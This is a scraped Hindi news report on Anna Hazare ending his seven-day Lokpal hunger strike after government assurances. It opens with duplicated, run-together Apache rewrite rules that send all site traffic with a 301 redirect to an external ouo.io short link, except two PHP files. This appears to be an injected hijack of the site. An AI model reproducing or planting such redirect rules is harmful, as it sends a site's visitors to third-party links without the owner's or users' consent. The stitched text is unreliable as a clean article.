
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 348
Nextनई दिल्ली। लोकपाल मामले को लेकर सरकार की ओर से मिले आश्वासन के बाद अन्ना हजारे ने सात दिन से जारी अपना अनशन कल खत्म कर दिया।
इस संबंध में अन्ना का कहना है लोकपाल में सरकार जल्द निर्णय लेने की बात कह रही है। साथ ही सरकार ने राइट टू रिकाल और राइट टू रिजेक्ट के लिए चुनाव आयोग से बात करने का भी आश्वासन दिया है। वे आगे कहते हैं कि सरकार ने जल्द से जल्द इन मुद्दों पर कार्यवाही करने का आश्वाशन मिला है। मैं 6 माह तक का इंतजार करूंगा। यदि तब तक ये मांगें पूरी नहीं होती हैं, तो सितंबर में फिर अनशन करूंगा। महाराष्ट्र के मुख्यमंत्री देवेंद्र फडणवीस ने अन्ना को पानी पिला कर यह अनशन तुड़वाया। इससे पहले आज सभी 292 अनशनकारियों को अन्ना हजारे के पास वाले मंच पर बुलाया गया था। अन्ना हजारे 23 मार्च से अनशन पर हैं और गुरुवार को इस अनशन का सातवां दिन था। उनके सहयोगी दत्ता अवारी ने बताया था कि अन्ना का वजन पांच किलोग्राम से ज्यादा घट गया है और अनशन की वजह से उनका रक्तचाप भी गिरा है।